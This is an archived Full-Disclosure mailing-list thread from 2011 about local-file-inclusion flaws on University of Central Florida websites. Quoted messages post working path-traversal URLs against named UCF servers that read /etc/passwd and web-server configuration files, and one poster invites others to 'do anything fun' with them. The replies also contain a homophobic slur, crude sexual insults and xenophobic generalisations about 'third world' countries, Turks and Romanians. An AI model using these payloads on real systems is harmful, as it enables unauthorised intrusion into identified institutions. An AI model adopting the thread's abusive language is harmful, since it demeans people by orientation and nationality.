lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 21 Feb 2011 13:56:44 +0000
From: Benji <me@...ji.com>
To: Nikhil Mittal <nikhil_uitrgpv@...oo.co.in>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: University of Central Florida Multiple LFI

>>So fag, what you would have done it for ? Free gay sex with Administrators
from the University ?

silly question, noone else wouldve done it.

On Mon, Feb 21, 2011 at 1:48 PM, Nikhil Mittal
<nikhil_uitrgpv@...oo.co.in>wrote:

>
> >>Madhur Ahuja and "Hack Talk" are obviously from third world countries
> >>and are only doing this for publicity
>
>
> So fag, what you would have done it for ? Free gay sex with Administrators
> from the University ?
>
> You felt bad if kids from so called "Third World" countries used FD for
> some adventure. Come on get past this "Third World" mentality.
>
> --- On *Sat, 19/2/11, full-disclosure-request@...ts.grok.org.uk <
> full-disclosure-request@...ts.grok.org.uk>* wrote:
>
>
> From: full-disclosure-request@...ts.grok.org.uk <
> full-disclosure-request@...ts.grok.org.uk>
> Subject: Full-Disclosure Digest, Vol 72, Issue 45
> To: full-disclosure@...ts.grok.org.uk
> Date: Saturday, 19 February, 2011, 10:42 PM
>
>
> Message: 12
> Date: Sat, 19 Feb 2011 11:48:22 -0500
> From: Eyeballing Weev <eyeballing.weev@...il.com<http://mc/compose?to=eyeballing.weev@gmail.com>
> >
> Subject: Re: [Full-disclosure] University of Central Florida Multiple
>     LFI
> To: full-disclosure@...ts.grok.org.uk<http://mc/compose?to=full-disclosure@lists.grok.org.uk>
> Message-ID: <4D5FF456.3000503@...il.com<http://mc/compose?to=4D5FF456.3000503@gmail.com>
> >
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>
> Madhur Ahuja and "Hack Talk" are obviously from third world countries
> and are only doing this for publicity, much like how Turks and Romanians
> "hack" into websites for defacement purposes. Same concept just applied
> differently.
>
> On 02/19/2011 11:45 AM, Shawn Merdinger wrote:
> > Hi,
> >
> > At the risk of being ridiculed here, I'll point out that UCF does have
> > a Infosec office and a incident response POC.
> >
> > https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx
> > sirt@...l.ucf.edu <http://mc/compose?to=sirt@mail.ucf.edu>
> >
> > fwiw, security folks in .edus are at the low-end of this industry's
> > pay-scale and it's difficult to find/retain qualified people, not to
> > mention adequate budget for purchasing (even more) crappy security
> > products and almost no budget for professional development like
> > training and conferences.
> >
> > I would expect there are more challenging targets out there, were one
> > inclined...
> >
> > Cheers,
> > --scm
> >
> >
> > On Sat, Feb 19, 2011 at 06:04, Madhur Ahuja<ahuja.madhur@...il.com<http://mc/compose?to=ahuja.madhur@gmail.com>>
> wrote:
> >>
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
> >>
> >> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog@...il.com<http://mc/compose?to=hacktalkblog@gmail.com>>
> wrote:
> >>>
> >>> Found these and thought I'd share:
> >>>
> >>> -==================-
> >>>
> >>>
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> >>>
> >>>
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> >>> -==================-
> >>> Let me know if you do anything fun with 'em
> >>>
> >>> Luis Santana - Security+
> >>> Administrator - http://hacktalk.net
> >>> HackTalk Security - Security From The Underground
> >>>
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists